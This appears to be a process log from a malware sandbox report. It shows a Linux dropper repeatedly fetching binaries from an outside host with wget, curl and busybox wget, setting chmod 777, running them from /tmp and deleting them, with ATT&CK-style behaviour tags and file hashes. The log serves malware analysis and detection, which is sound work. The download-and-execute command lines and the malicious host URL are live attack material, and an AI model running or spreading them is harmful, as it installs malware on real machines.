/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵PID:950
-
-
/bin/chmodchmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:957
-
-
/bin/chmodchmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- System Network Configuration Discovery
PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:971
-
-
/bin/chmodchmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:985
-
-
/bin/chmodchmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:999
-
-
/bin/chmodchmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:1009
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- System Network Configuration Discovery
PID:1010
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1011
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- System Network Configuration Discovery
PID:1013
-
-
/bin/chmodchmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- File and Directory Permissions Modification
PID:1014
-
-
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Executes dropped EXE
PID:1015
-
-
/bin/rmrm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:1016
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97